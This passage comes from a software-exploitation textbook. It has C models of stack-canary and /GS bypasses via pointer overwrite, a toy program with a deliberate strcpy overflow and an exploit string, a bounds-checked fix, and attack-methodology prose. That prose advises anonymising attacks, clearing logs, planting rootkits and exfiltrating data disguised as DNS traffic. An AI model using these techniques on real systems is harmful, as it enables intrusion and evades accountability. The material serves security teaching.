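    char       buf[16];
    uintptr_t *p;      /* pointer later written through by the function itself */
    uintptr_t  guard;  /* StackGuard canary slot */
    uintptr_t  ret;    /* saved return address */
};

#define CANARY ((uintptr_t)0x000AFF0Du)   /* terminator-style canary (assumed) */

/* Plain StackGuard: the guard holds the canary value itself. */
void plain_enter(struct frame *f, uintptr_t ret) { f->guard = CANARY; f->ret = ret; f->p = NULL; }
int  plain_check(const struct frame *f)          { return f->guard == CANARY; }

/* Improved StackGuard: guard = canary XOR return address, so ret cannot
   change without the check failing [Cowan et al., 1998]. */
void xor_enter(struct frame *f, uintptr_t ret) { f->ret = ret; f->guard = CANARY ^ ret; f->p = NULL; }
int  xor_check(const struct frame *f)          { return (f->guard ^ f->ret) == CANARY; }

/* Pattern 1: a linear overflow of buf that runs through p and guard and
   lands target in ret. Both variants catch it because the guard is smashed. */
void linear_overflow(struct frame *f, uintptr_t target) {
    unsigned char payload[sizeof *f];
    memset(payload, 'A', sizeof payload);
    memcpy(payload + offsetof(struct frame, ret), &target, sizeof target);
    memcpy((unsigned char *)f, payload, sizeof payload);   /* the unchecked copy */
}

/* Pattern 2 (Phrack 56): overflow only far enough to make p point at ret,
   then let the function's own later write through p deliver target.
   The guard word is never touched. */
void pointer_overflow(struct frame *f, uintptr_t target) {
    uintptr_t *where = &f->ret;
    unsigned char payload[offsetof(struct frame, p) + sizeof f->p];
    memset(payload, 'A', sizeof payload);
    memcpy(payload + offsetof(struct frame, p), &where, sizeof where);
    memcpy((unsigned char *)f, payload, sizeof payload);   /* first unchecked copy: p = &ret */
    *f->p = target;                                         /* the function's later write via p */
}

/* 1 if the plain canary is bypassed: ret was redirected, check still passes. */
int plain_canary_bypassed(void) {
    struct frame f;
    plain_enter(&f, 0x1000);
    pointer_overflow(&f, 0xDEAD);
    return plain_check(&f) && f.ret == 0xDEAD;
}

/* 1 if the XOR canary catches the same pointer-overwrite attack. */
int xor_canary_detects_pointer_overwrite(void) {
    struct frame f;
    xor_enter(&f, 0x1000);
    pointer_overflow(&f, 0xDEAD);
    return !xor_check(&f) && f.ret == 0xDEAD;
}

/* 1 if both variants catch the linear overflow. */
int linear_overflow_detected(void) {
    struct frame a, b;
    plain_enter(&a, 0x1000); linear_overflow(&a, 0xDEAD);
    xor_enter(&b, 0x1000);   linear_overflow(&b, 0xDEAD);
    return !plain_check(&a) && !xor_check(&b) && a.ret == 0xDEAD && b.ret == 0xDEAD;
}

int main(void) {
    printf("pointer overwrite vs plain canary: bypassed=%d\n", plain_canary_bypassed());
    printf("pointer overwrite vs XOR canary:   detected=%d\n", xor_canary_detects_pointer_overwrite());
    printf("linear overflow vs both variants:  detected=%d\n", linear_overflow_detected());
    return 0;
}
```

The XOR variant only helps when the redirected write lands on the return address itself. Aim the same write at a function pointer that lives outside the frame, the GOT entry the Phrack article uses, or any writable global the runtime will call later, and neither check sees anything, because nothing in the frame changed.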

An Overview of Microsoft's Port of StackGuard

Many details about Microsoft's /GS implementation can be found in three CRT source files: namely, seccinit.c, seccook.c, and secfail.c. Others can be found by examining the instructions generated by the compiler with the /GS option. One "security cookie" (canary) will be initialized in the call of CRT_INIT. There is a new library call, _set_security_error_handler, that can be used to install a user-defined handler. The function pointer to the user handler will be stored in a global variable user_handler. On function exit, the compiler-generated instruction jumps to the function __security_check_cookie defined in seccook.c. If the security cookie is modified, __security_error_handler defined in secfail.c would be called. The code in __security_error_handler first checks whether a user-supplied handler is installed. If so, the user handler will be called. Otherwise, a default "Buffer Overrun Detected" message is displayed and the program terminates.

There is at least one problem with this implementation. In Windows, something like a "writable" GOT doesn't exist, so even given the aforementioned layout of the stack, it is not that easy for an attacker to find a function pointer to use. However, because of the availability of the variable user_handler, an attacker doesn't need to look very far before finding an excellent target!
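A model of the /GS runtime pieces the text names, added here as example code that is not Microsoft's CRT: a process-wide cookie, the global user_handler slot that _set_security_error_handler fills, and the check and error routines that run on function exit. The two scenario functions show why a writable handler slot is the wrong thing to have: with no handler installed, a smashed cookie reaches the default path and the process terminates; once a single attacker-controlled pointer write (the primitive the pointer-overwrite pattern yields) has replaced user_handler, the routine meant to stop the overflow calls the attacker instead. The cookie values, the arbitrary_write primitive and the function names are constructed; termination is modelled by a flag rather than exiting.

```c
#include <stdint.h>
#include <stdio.h>

/* Handler signature modelled on the CRT's: a code describing the failure. */
typedef void (*security_handler_t)(int code);

static uintptr_t          security_cookie = 0;
static security_handler_t user_handler    = NULL;  /* the global the text calls an excellent target */
static int                terminated      = 0;     /* stands in for process termination */

/* CRT_INIT: seed the per-process cookie (value assumed). */
void crt_init_cookie(uintptr_t cookie) { security_cookie = cookie; terminated = 0; }

/* _set_security_error_handler: installs a user handler, returns the old one. */
security_handler_t set_security_error_handler(security_handler_t h) {
    security_handler_t old = user_handler;
    user_handler = h;
    return old;
}

/* __security_error_handler: call the user handler if one is installed,
   otherwise print "Buffer Overrun Detected" and terminate. */
void security_error_handler(int code) {
    if (user_handler) { user_handler(code); return; }
    printf("Buffer Overrun Detected!\n");
    terminated = 1;
}

/* __security_check_cookie: compare the frame's cookie with the global one.
   Returns 1 if intact; on mismatch routes to the error handler and returns 0. */
int security_check_cookie(uintptr_t frame_cookie) {
    if (frame_cookie == security_cookie) return 1;
    security_error_handler(1);   /* code 1: stack buffer overrun (assumed) */
    return 0;
}

/* What an attacker wants to run; here it only records that it ran. */
static int attacker_ran = 0;
void attacker_payload(int code) { (void)code; attacker_ran = 1; }

/* One attacker-controlled pointer-sized write, the primitive a pointer
   overwrite after a buffer yields. Aimed at user_handler in scenario B. */
void arbitrary_write(security_handler_t *where, security_handler_t what) { *where = what; }

/* Scenario A: cookie smashed, no handler installed. The default path
   terminates and the overflow is contained. Returns 1 if so. */
int default_path_contains_overflow(void) {
    crt_init_cookie(0x5A5A1234);
    attacker_ran = 0;
    user_handler = NULL;
    int ok = security_check_cookie(0x41414141);   /* 'AAAA': smashed cookie */
    return !ok && terminated && !attacker_ran;
}

/* Scenario B: the same overflow also wrote user_handler before the check
   ran. The protection's own error path now calls the attacker. Returns 1 if so. */
int handler_hijack_runs_attacker(void) {
    crt_init_cookie(0x5A5A1234);
    attacker_ran = 0;
    user_handler = NULL;
    arbitrary_write(&user_handler, attacker_payload);
    int ok = security_check_cookie(0x41414141);
    return !ok && !terminated && attacker_ran;
}

int main(void) {
    printf("no handler installed: contained=%d\n", default_path_contains_overflow());
    printf("user_handler overwritten: attacker ran=%d\n", handler_hijack_runs_attacker());
    return 0;
}
```

The design lesson is that a failure path must not depend on writable state the same bug can reach: the recovery pointer has to live in read-only memory, be encoded with a secret, or not exist at all. Later Visual C++ releases dropped the user-installable handler and terminate unconditionally on a cookie mismatch.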

Bypassing the Microsoft Feature

Let's take a look at the following toy program:

    #include <stdio.h>
    #include <string.h>

    /*
    request_data, in parameter which contains user supplied encoded string like
    "host=dot.net&id=user_id&pw=user_password&cookie=da".
    user_id, out parameter which is used to copy decoded 'user_id'.
    password, out parameter which is used to copy decoded 'password'
    */
    void decode(char *request_data, char *user_id, char *password){
        char temp_request[64];
        char *p_str;

        /* Unbounded copy: request_data longer than 63 bytes overflows temp_request. */
        strcpy(temp_request, request_data);
        p_str = strtok(temp_request, "&");
        while(p_str != NULL){
            if (strncmp(p_str, "id=", 3) == 0){
                strcpy(user_id, p_str + 3);
            }
            else if (strncmp(p_str, "pw=", 3) == 0){
                strcpy(password, p_str + 3);
            }
            p_str = strtok(NULL, "&");
        }
    }

    /*
    Any combination will fail.
    */
    int check_password(char *id, char *password){
        return -1;
    }

    /*
    We use argv[1] to provide request string.
    */
    int main(int argc, char ** argv) {
        char user_id[32];
        char password[32];

        user_id[0] = '\0';
        password[0] = '\0';

        if ( argc < 2 ) {
            printf("Usage: victim request.\n");
            return 0;
        }

        decode(argv[1], user_id, password);

        if ( check_password(user_id, password) > 0 ){
            //Dead code.
            printf("Welcome!\n");
        }
        else{
            printf("Invalid password, user:%s password:%s.\n", user_id, password);
        }

        return 0;
    }

The function decode contains an unchecked buffer temp_request, and its parameters user_id and password can be overwritten by overflowing temp_request. If the program is compiled with the /GS option, it is not possible to alter the program's execution path by overflowing the return address of the function decode. However, it is possible to overflow the parameter user_id of the function decode to make it point to the aforementioned variable user_handler first! So, when strcpy(user_id, p_str + 3); is called, we can assign a desired value to user_handler. For example, we can make it point to the memory location of printf("Welcome!\n");, so that when the buffer overflow is detected, there would appear to be a user-installed security handler and the program will execute printf("Welcome!\n");. Our exploit string looks like this:

id=[location to jump to]&pw=[any]AAAAAAA...AAA[address of user_handler]

With a compiled, "protected" binary, determining the memory address of user_handler is trivial given some knowledge of reverse engineering. The upshot is that a protected program is actually vulnerable to the kind of attack it is supposed to be protected from.
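A bounds-checked rewrite of the decode() routine above, added here as an example (it is not the book's code): it refuses a request longer than the 63 bytes the original's temp_request could hold, and refuses any id= or pw= value that would not fit the caller's buffer, rather than copying blindly. The names decode_safe and copy_field and the return codes are this example's own.

```c
/* Added example, not from the book: a bounds-checked version of decode().
 * The original copies request_data into a 64-byte temp_request with
 * strcpy() and copies each field into the caller's 32-byte arrays with
 * strcpy(); a long request therefore overruns both.  Names and return
 * codes here (decode_safe, copy_field, DECODE_*) are this example's own. */
#include <stddef.h>
#include <string.h>

enum { DECODE_OK = 0, DECODE_TOO_LONG = -1, DECODE_FIELD_TOO_LONG = -2 };

/* Copy one field value into out[out_len], refusing (not truncating) when
 * it would not fit together with its NUL terminator. */
static int copy_field(const char *src, size_t src_len, char *out, size_t out_len)
{
    if (src_len >= out_len)
        return DECODE_FIELD_TOO_LONG;
    memcpy(out, src, src_len);
    out[src_len] = '\0';
    return DECODE_OK;
}

/* Parse "key=value&key=value..." without writing past any buffer.
 * user_id and password are always NUL-terminated on return, even on error.
 * The request is walked in place, so the temporary copy that the exploit
 * overflowed does not exist here; the 64-byte limit survives only as a
 * check on the input. */
int decode_safe(const char *request_data,
                char *user_id, size_t id_len,
                char *password, size_t pw_len)
{
    const char *p = request_data;
    int rc = DECODE_OK;

    if (id_len == 0 || pw_len == 0)
        return DECODE_FIELD_TOO_LONG;
    user_id[0] = '\0';
    password[0] = '\0';

    /* Same limit the original silently assumed, now enforced. */
    if (strlen(request_data) >= 64)
        return DECODE_TOO_LONG;

    while (*p != '\0') {
        const char *amp = strchr(p, '&');
        size_t tok_len = amp ? (size_t)(amp - p) : strlen(p);

        if (tok_len >= 3 && strncmp(p, "id=", 3) == 0)
            rc = copy_field(p + 3, tok_len - 3, user_id, id_len);
        else if (tok_len >= 3 && strncmp(p, "pw=", 3) == 0)
            rc = copy_field(p + 3, tok_len - 3, password, pw_len);
        if (rc != DECODE_OK)
            return rc;

        p = amp ? amp + 1 : p + tok_len;   /* next token, or end of string */
    }
    return DECODE_OK;
}
```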

Solutions

There are several alternative paths that can be followed to thwart this attack pattern. The best solution involves having developers adopt a type-safe language such as Java or C#. The next best solution is to compile in dynamic checks on string functions that occur at runtime (although the performance hit must be accounted for). These solutions do not always make sense given project constraints. Modifying the current /GS approach is also possible. The main goal of each of the following suggested fixes is to achieve a higher level of data integrity on the stack.

1. Ensure the integrity of stack variables by checking the canary more aggressively. If a variable is placed after a buffer on the stack, a sanity check should be performed before that variable is used. The frequency of such checks can be controlled by applying data-dependence analysis.

2. Ensure the integrity of stack variables by rearranging the layout of the stack. Whenever possible, local nonbuffer variables should be placed before buffer variables. Furthermore, because the parameters of a function will be located after local buffers (if there are any), they should be treated as well. On function entry, extra stack space can be reserved before local buffers so that all parameters can be copied. Each use of a parameter inside the function body is then replaced with its newly created copy. Work on this solution has already been done by at least one IBM research project.[11]

[11] For more information, see GCC Extension For Protecting Applications From Stack-Smashing Attacks, available at http://www.trl.ibm.com/projects/security/ssp/.

3. Ensure the integrity of global variables by providing a managed-writable mechanism. Very often, critical global variables become corrupted as a result of program errors and/or intentional abuse. A managed-writable mechanism can place a group of such variables in a read-only region. When modifying a variable in the region is necessary, the memory access permission of the region can be changed to "writable." After the modification is made, its permission is changed back to "read-only." With such a mechanism, an unexpected "write" to a protected variable results in a memory access violation. For the kind of variable that only gets assigned once or twice in the life of a process, the overhead of applying a managed-writable mechanism is negligible. Subsequent releases of the Microsoft compiler have adopted pieces of these ideas.

An Exploit in Retrospect

By now, the irony of this attack should be apparent: Microsoft ended up building a security vulnerability seeder into their compiler by creating a feature intended to thwart a standard attack! The great thing is that the attack pattern of the exploit against the broken feature is the very same attack pattern that the feature was supposed to protect against. The problem is that nonvulnerable uses of some string functions become vulnerable when the feature is invoked. This is bad for software security, but it's good for exploiting software.[12]

[12] The announcement of this flaw caused a considerable flurry in the press. See http://www.cigital.com/press for pointers to the resulting articles.

Two years after this flaw was publicly discussed, at least two 0day exploits were discovered that were built around leveraging the /GS flag to carry out two-stage trampoline-based attacks. As predicted, the security mechanism was used as a foothold in these exploits.

Applying Attack Patterns

Attacking a system is a process of discovery and exploitation. Attackers progress through a series of discovery phases before actually finding and exploiting a software vulnerability. What follows is a very high-level overview of the steps commonly used. Later in the book we, by and large, pass over repeating these ideas in favor of focusing more attention on technical discussion of exploits.

A successful attack takes several logical steps. First, qualify the target, mainly to learn what input points exist. Next, figure out the kinds of transactions that are accepted at the input points. Each kind of transaction must be explored to determine what kinds of attacks will work. You can then use attack patterns to construct malformed but "legal" transactions that manipulate the software in interesting ways. This requires close observation of the results of each transaction you send to determine whether you might have discovered a possible vulnerability. Once a vulnerability is discovered, you can try to exploit it and thereby gain access to the system.

In this section, we cover several broad categories of attack patterns. Particular attack patterns can be found in each of these categories. A seasoned attacker will have working attack patterns for all the categories. In combination, a set of attack patterns becomes the tool kit of the successful attacker.

Network Scanning

There are many special-purpose tools for network scanning. Rather than discuss a particular set of tools or hacker scripts, we encourage you to explore the network protocols themselves, considering how they can be leveraged to acquire targets and to determine the structure of a network. Start with a book like Firewalls and Internet Security [Cheswick et al., 2003]. New attack patterns are still being discovered in protocols that are more than 20 years old (consider, for example, ICMP ping, UDP ping, SYN ping, and firewalking). Newer protocols provide even easier targets. We suggest that you examine Ofir Arkin's work on ICMP scanning.[13]

[13] Search for ICMP on Ofir Arkin's Web page at http://www.sys-security.com.

Network scanning can be thought of as something quite simple (and best left to tools) or it can be treated as a science in and of itself. Network scans can almost always be detected by remote sites that are managed by paranoid administrators who will call upstream on the red phone if their network sees a single rlogin port request, so watch out for that. On the other hand, a typical machine on the Internet today gets 10 to 20 port scans a day without noticing a thing. Tools that perform basic port scans are classic script kiddie tools. Even professional (and expensive) applications like Foundstone's FoundScan and NAI's CyberCop are very close in spirit to collections of freely available technologies. Sometimes port scans can be very sophisticated and sneaky, spreading over thousands of networks in a strange hard-to-detect drip-scan configuration. A target site may only get one or two packets an hour, but at the end of the week their systems will have been entirely scanned! Firewalls cause some minor inconvenience in this process, but port scans may be clever, using broadcast or multicast source addresses and clever port and flag combinations to defeat typical (lame) firewall filters.

OS Stack Identification

Once a target machine is discovered, additional tricks can be applied using standard protocols to discern the OS version on the target device. This includes techniques to tweak TCP options, perform IP fragmentation and reassembly, set TCP flags, and manipulate ICMP behavior. There are an incredible number of queries that can be used to determine the target OS. Most provide only a piece of the answer, but together they can be analyzed to come to a reasonable theory regarding the target OS. It's nearly impossible to hide the identity of a system when there are so many possible probes and responses. Any attempt to mask normal responses by sending out false information would, in effect, create a strange variation, but with enough determined probing, the system is almost always identifiable. Furthermore, certain settings applied to a network interface or stack are often remotely detectable. One example is the use of network sniffers. In many cases, the behavior of a machine that is running a sniffer is unique and can be remotely detected (for more information go to http://packetstormsecurity.nl/sniffers/antisniff). Machines running in promiscuous mode are more open to network-level attacks because the system ends up processing all packets on the network, even ones destined for other hosts.

Port Scans

Primarily a network-layer function, port scans can be run against the target to determine which services are running. This includes both TCP and UDP ports. If a listening port is discovered, transactions can be run against the port to determine the service running on the port and the protocols it appears to understand. Many hackers cut their programming teeth by writing port scanners. Thus, there are thousands of port scanners available, but most of them are really bad designs. The most common port scanner is so well-known it doesn't require much discussion here. It is called nmap (for more information go to http://www.insecure.org/nmap/). If you have never played around with port scanning, then nmap is a good choice to start with since it supports so many variations of scanning. Go a step further than normal by using a network sniffer to analyze the scans produced by nmap.

Traceroute and Zone Transfers

Traceroute packets are a clever way to determine the physical layout of network devices. DNS servers provide a great deal of information about IP addresses and the purpose of machines that are connected to them. OS identification data and port scans can be overlaid to provide a surprising amount of detail for an attacker. When used together, a very accurate map of a target network can be built. In effect, this activity results in a detailed map of the network and clearly illustrates input points where attack data will be accepted into application-layer software. At this stage, the application software can be probed directly. Be aware that zone files can be very large. Several years ago, one of the authors (Hoglund) received a zone file for the entire country of France. (It was big.)

Target Components

If the target system includes public file or Web services, these should be examined for possible low-hanging fruit. Target components such as cgi programs, scripts, servlets, and EJBs are notoriously easy to knock over. Each component may accept transactions and thus presents an interesting input point to investigate further. You can query the target to learn about and even craft working transactions, or you can launch network sniffers that record real-world transactions executed against the target. These can be used as baseline transactions that can later be tweaked according to more specific attack patterns described in this book.

Choosing Attack Patterns

Once a valid transaction pattern is discovered, it can be mutated using a variety of attack patterns. You might try command injection, file system API injection, database Structured Query Language (SQL) insertion, application-layer denial of service, or network-based denial of service. You might also explore the input space looking for buffer overflows. If a vulnerability is discovered, then it can be leveraged to gain access to the system.

Leveraging Faults in the Environment

Once a vulnerability is uncovered, a variety of attack payloads can be applied to gain remote access to the system. Common attack payloads are covered throughout this book. The advantage to our systematic systems-level approach is that the visibility of particular problems can be determined. A certain problem may only be exploitable from inside the firewall. Because we have a large network view of the target, we may be able to find other neighboring servers that can be exploited, and thus take advantage of our knowledge of the system to circle back later. This allows us to take a number of subtle steps to infiltrate a target system. Consider, for example, a target on a DSL line. The DSL provider may have a DSLAM that serves many clients. The DSLAM may forward all broadcast traffic to all downstream subscribers. If the target is well protected or has few input points, it might make more sense to attack another nearby system. Once that is compromised, the nearby system can be used to ARP hijack the hard target.

Using Indirection

A clear goal when penetrating a system is to hide the attacker's identity. This is very easy to accomplish today using uplinks to unprotected 802.11 wireless networks.[14] A Starbucks coffee shop with a wireless link may present an incredibly comfortable place from which to launch attacks. The last thing you need to do is to pick up your "double-short dry cap" in a drive-thru on your way to some cold wet alley! Indirection techniques let you keep your safe zone warm and dry, even corporate. Geopolitics also help with indirection. You're fairly safe if you're drinking coffee in a Houston Starbucks while launching an attack from New Delhi over the border into China. There will be no Internet Service Providers (ISPs) sharing log files across those borders. And extradition is out of the question.

[14] See 802.11 Security [Potter and Fleck, 2003].

Planting Backdoors

Once an exploit has been successful, chances are that you will attain complete access to a host inside the target network. Establishing a secure tunnel over the firewall and cleaning up any possible log files is the next step. If you cause a noticeable fault in the target system, the fault will, by definition, have observable effects. Your goal is to remove any trace of these observable effects. Reboot anything that may have crashed. Clear all logs that show program violations or packet traces. You will typically want to leave a rootkit program or backdoor shell that will enable access at any time. Chapter 8 is all about such tricks. A rootkit program can be hidden on the host. Kernel modifications make it possible to hide a rootkit completely from system administrator auditing software. Your backdoor code can even be hidden within the BIOS or within the EEPROM memory of peripheral cards and equipment. A good backdoor may be triggered by a special packet or it may be active only at certain times. It may perform duties while you are away, such as keystroke logging or packet sniffing. A favorite of the military seems to be reading e-mail. The FBI appears to like keystroke monitors. What your remote monitor does depends on your goals. Data can be fed out of the network in real time or stored in a safe place for later retrieval. Data can be encrypted for protection in case of discovery. Storage files can be hidden using special kernel modifications. Data can be fed out of the network using packets that appear to be standard protocols (using steganographic tricks). If a network has a great deal of DNS activity, then hiding outgoing data in DNS look-alike packets is a good idea. Sending bursts of completely normal traffic along with your disguised packets can also make the special packets harder to locate. If you really want to get fancy, you can use classic steganography tricks, even at the packet level.


Attack Pattern Boxes

Many of the chapters in the remainder of the book include boxes briefly describing particular attack patterns. These boxes serve to generalize and encapsulate an important attack pattern from the text that surrounds it. Such boxes look like this (the example displayed here appears in Chapter 4):

Target Programs That Write to Privileged OS Resources

Look for programs that write to the system directories or registry keys (such as HKLM). These are typically run with elevated privileges and usually have not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.


Conclusion

In this chapter we provided a short introduction to attack patterns and discussed a standard process by which an attack is carried out. Our treatment here is very high level. If you need more information on the basics, check out some of the references we cited. Later chapters dive more deeply into an examination of technical details. Most of the remainder of this book is devoted to understanding particular exploits that fit within our attack pattern taxonomy.


Chapter 3. Reverse Engineering and Program Understanding


Most people interact with computer programs at a surface level, entering input and eagerly (impatiently?!) awaiting a response. The public façade of most programs may be fairly thin, but most programs go much deeper than they appear at first glance. Programs have a preponderance of guts, where the real fun happens. These guts can be very complex. Exploiting software usually requires some level of understanding of software guts. The single most important skill of a potential attacker is the ability to unravel the complexities of target software. This is called reverse engineering or sometimes just reversing. Software attackers are great tool users, but exploiting software is not magic and there are no magic software exploitation tools. To break a nontrivial target program, an attacker must manipulate the target software in unusual ways. So although an attack almost always involves tools (disassemblers, scripting engines, input generators), these tools tend to be fairly basic. The real smarts remain the attacker's prerogative.

When attacking software, the basic idea is to grok the assumptions made by the people who created the system and then undermine those assumptions. (This is precisely why it is critical to identify as many assumptions as possible when designing and creating software.) Reverse engineering is an excellent approach to ferreting out assumptions, especially implicit assumptions that can be leveraged in an attack.[1]

[1] A friend at Microsoft related an anecdote involving a successful attacker who made use of the word "assume" to find interesting places to attack in code. Unsuspecting developers assumed that writing about what they assumed would be OK. This is a social-level attack pattern. Similar searches through code for XXX, FIX, BUG, TODO also tend to work.

Into the House of Logic

In some sense, programs wrap themselves around valuable data, making and enforcing rules about who can get to the data and when. The very edges of the program are exposed to the outside world just the way the interior of a house has doors at its public edges. Polite users go through these doors to get to the data they need that is stored inside. These are the entry points into software. The problem is that the very doors used by polite company to access software are also used by remote attackers. Consider, for example, a very common kind of Internet-related software door, the TCP/IP port. Although there are many types of doors in a typical program, many attackers first look for TCP/IP ports. Finding TCP/IP ports is simple using a port-scanning tool. Ports provide public access to software programs, but finding the door is only the beginning. A typical program is complex, like a house made up of many rooms. The best treasure is usually found buried deep in the house. In all but the most trivial of exploits, an attacker must navigate complicated paths through public doors, journeying deep into the software house. An unfamiliar house is like a maze to an attacker. Successful navigation through this maze renders access to data and sometimes complete control over the software program itself.

Software is a set of instructions that determines what a general-purpose computer will do. Thus, in some sense, a software program is an instantiation of a particular machine (made up of the computer and its instructions). Machines like this obviously have explicit rules and well-defined behavior. Although we can watch this behavior when we run a program on a machine, looking at the code and coming to an understanding of the inner workings of a program sometimes takes more effort. In some cases the source code for a program is available for us to examine; other times, it is not. Therefore, attack techniques must not always rely on having source code. In fact, some attack techniques are valuable regardless of the availability of source code. Other techniques can actually reconstruct the source code from the machine instructions. These techniques are the focus of this chapter.

Reverse Engineering

Reverse engineering is the process of creating a blueprint of a machine to discern its rules by looking only at the machine and its behavior. At a high level, this process involves taking something that you may not completely understand technically when you start, and coming to understand completely its function, its internals, and its construction. A good reverse engineer attempts to understand the details of software, which by necessity involves understanding how the overall computing machinery that the software runs on functions. A reverse engineer requires a deep understanding of both the hardware and the software, and how it all works together.

Think about how external input is handled by a software program. External "user" input can contain commands and data. Each code path in the target involves a number of control decisions that are made based on input. Sometimes a code path will be wide and will allow any number of messages to pass through successfully. Other times a code path will be narrow, closing things down or halting if the input isn't formatted exactly the right way. This series of twists and turns can be mapped if you have the right tools. Figure 3-1 illustrates code paths as found in a common FTP server program. In this diagram, a complex subroutine is being mapped. Each location is shown in a box along with the corresponding machine instructions.

Figure 3-1. This graph illustrates control flow through a subroutine in a common FTP server. Each block is a set of instructions that runs as a group, one instruction after the other. The lines between boxes illustrate the ways that control in the code connects boxes. There are various "branches" between the boxes that represent decision points in the control flow. In many cases, a decision regarding how to branch can be influenced by data supplied by an attacker.
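The boxes and branches of Figure 3-1, built in code as an added example (this is not code from the book): the Python script below splits a constructed, simplified x86-style listing into basic blocks, records the edges between them, lists the decision points where a branch depends on data, and enumerates every loop-free path from entry to a return. The listing, its syntax and the label names are assumptions made for illustration and are not the FTP server subroutine the figure shows.

```python
"""Map a subroutine's code paths as basic blocks and the branches between them."""
from collections import OrderedDict

# Constructed toy listing in a simplified x86-like syntax. It is NOT the FTP
# server subroutine of Figure 3-1, just a small dispatcher shaped like one.
LISTING = """
entry:
    mov  eax, [input_len]
    cmp  eax, 0
    je   reject            ; empty input -> reject
    cmp  eax, 512
    jg   reject            ; oversized input -> reject
    mov  ecx, [input_cmd]
    cmp  ecx, 'U'
    jne  check_pass
    call handle_user
    jmp  done
check_pass:
    cmp  ecx, 'P'
    jne  reject            ; unknown command -> reject
    call handle_pass
    jmp  done
reject:
    mov  eax, -1
    ret
done:
    xor  eax, eax
    ret
"""

COND_JUMPS = {"je", "jne", "jz", "jnz", "jg", "jge", "jl", "jle", "ja", "jb"}

def parse_listing(text):
    """Return (label, mnemonic, operand) per instruction; a label line attaches
    to the instruction that follows it. Text after ';' is a comment."""
    instrs, pending = [], None
    for raw in text.splitlines():
        line = raw.split(";")[0].strip()
        if not line:
            continue
        if line.endswith(":"):
            pending = line[:-1]
            continue
        parts = line.split(None, 1)
        operand = parts[1].strip() if len(parts) > 1 else ""
        instrs.append((pending, parts[0].lower(), operand))
        pending = None
    return instrs

def build_cfg(text):
    """Split the listing into basic blocks (the boxes of Figure 3-1). Returns
    (blocks, edges): name -> instruction strings, name -> successor names."""
    instrs = parse_listing(text)
    # A leader starts a block: the first instruction, any labelled instruction
    # (a jump target), and the instruction right after a jump or return.
    leaders = {0}
    for i, (label, mn, _) in enumerate(instrs):
        if label is not None:
            leaders.add(i)
        if (mn in COND_JUMPS or mn in ("jmp", "ret")) and i + 1 < len(instrs):
            leaders.add(i + 1)
    starts = sorted(leaders)
    name_of = {s: instrs[s][0] or f"blk_{n}" for n, s in enumerate(starts)}
    blocks, edges = OrderedDict(), OrderedDict()
    for n, s in enumerate(starts):
        end = starts[n + 1] if n + 1 < len(starts) else len(instrs)
        name = name_of[s]
        blocks[name] = [f"{mn} {op}".strip() for _, mn, op in instrs[s:end]]
        last_mn, last_op = instrs[end - 1][1], instrs[end - 1][2]
        succ = []
        if last_mn in COND_JUMPS:          # decision: taken target + fall-through
            succ.append(last_op)
            if end < len(instrs):
                succ.append(name_of[end])
        elif last_mn == "jmp":             # unconditional: target only
            succ.append(last_op)
        elif last_mn != "ret" and end < len(instrs):
            succ.append(name_of[end])      # plain fall-through into the next block
        edges[name] = succ
    return blocks, edges

def decision_points(edges):
    """Blocks with more than one successor: the branches where input steers control."""
    return [name for name, succ in edges.items() if len(succ) > 1]

def enumerate_paths(edges, entry):
    """Every loop-free path from entry to a block with no successors (a return)."""
    paths = []
    def walk(node, path):
        path = path + [node]
        if not edges[node]:
            paths.append(path)
        for nxt in edges[node]:
            if nxt not in path:            # skip back-edges so the walk terminates
                walk(nxt, path)
    walk(entry, [])
    return paths
```

Running `build_cfg(LISTING)` on the toy listing yields eight blocks with four decision points, and `enumerate_paths` finds five distinct routes from `entry` to a `ret`, which is the "series of twists and turns" the text describes.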


Generally speaking, the deeper you go as you wander into a program, the longer the code path between the input where you "start" and the place where you end up. Getting to a particular location in this house of logic requires following paths to various rooms (hopefully where the valuables are). Each internal door you pass through imposes rules on the kinds of messages that may pass. Wandering from room to room thus involves negotiating multiple sets of rules regarding the input that will be accepted. This makes crafting an input stream that can pass through lots of doors (both external and internal) a real challenge. In general, attack input becomes progressively more refined and specific as it digs deeper into a target program. This is precisely why attacking software requires much more than a simple brute-force approach. Simply blasting a program with random input almost never traverses all the code paths. Thus, many possible paths through the house remain unexplored (and unexploited) by both attackers and defenders.

Why Reverse Engineer?

Reverse engineering allows you to learn about a program's structure and its logic. Reverse engineering thus leads to critical insights regarding how a program functions. This kind of insight is extremely useful when you exploit software. There are obvious advantages to be had from reverse engineering. For example, you can learn the kind of system functions a target program is using. You can learn the files the target program accesses. You can learn the protocols the target software uses and how it communicates with other parts of the target network.

The most powerful advantage to reversing is that you can change a program's structure and thus directly affect its logical flow. Technically this activity is called patching, because it involves placing new code patches (in a seamless manner) over the original code, much like a patch stitched on a blanket. Patching allows you to add commands or change the way particular function calls work. This enables you to add secret features, remove or disable functions, and fix security bugs without source code. A common use of patching in the computer underground involves removing copy protection mechanisms. Like any skill, reverse engineering can be used for good and for bad ends.

Should Reverse Engineering Be Illegal?

Because reverse engineering can be used to reconstruct source code, it walks a fine line in intellectual property law. Many software license agreements strictly forbid reverse engineering. Software companies fear (and rightly so) that their trade secret algorithms and methods will be more directly revealed through reverse engineering than they are through external machine observation. However, there is no general-purpose law against reverse engineering.

Because reverse engineering is a crucial step in removing copy protection schemes, there is some confusion regarding its legality. Patching software to defeat copy protection or digital rights management schemes is illegal. Reverse engineering software is not. If the law changes and reverse engineering is made illegal, then a serious blow will be dealt to the common user of software (especially the common and curious user). A law completely outlawing reverse engineering would be like a law making it illegal to open the hood of your car to repair it. Under such a system, car users would be required by law to go to the dealership for all repairs and maintenance.[2]

[2] Although this may not sound so bad to you, note that such a law may well make it illegal for any "nonauthorized" mechanic to work on your car as well.

Software vendors forbid reverse engineering in their license agreements for many reasons. One reason is that reverse engineering does, in fact, more obviously reveal secret methods. But all this is a bit silly, really. To a skilled reverse engineer, looking at the binary machine code of a program is just as good as having the source code. So the secret is already out, but in this case only specialists can "read" the code. Note that secret methods can be defended through other means than attempting to hide them from everyone but specialists in compiled code. Patents exist specifically for this purpose, and so does copyright law. A good example of properly protecting a program can be found in the data encryption algorithm domain. To be acceptable as actually useful and powerful, encryption algorithms must be published for the cryptographic world to evaluate. However, the inventor of the algorithm can maintain rights to the work. Such was the case with the popular RSA encryption scheme. Also note that although this book is copyrighted, you are allowed to read it and understand it. In fact, you're encouraged to do so.

